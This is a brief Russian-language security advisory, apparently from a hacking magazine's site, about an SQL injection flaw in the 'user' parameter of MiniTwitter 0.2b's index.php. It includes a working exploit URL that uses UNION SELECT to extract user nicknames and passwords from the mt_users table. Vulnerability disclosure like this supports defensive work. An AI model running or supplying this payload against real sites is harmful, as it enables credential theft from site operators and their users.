Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: MiniTwitter 0.2b
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «user» сценарием index.php. Удаленный
пользователь может помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,
concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*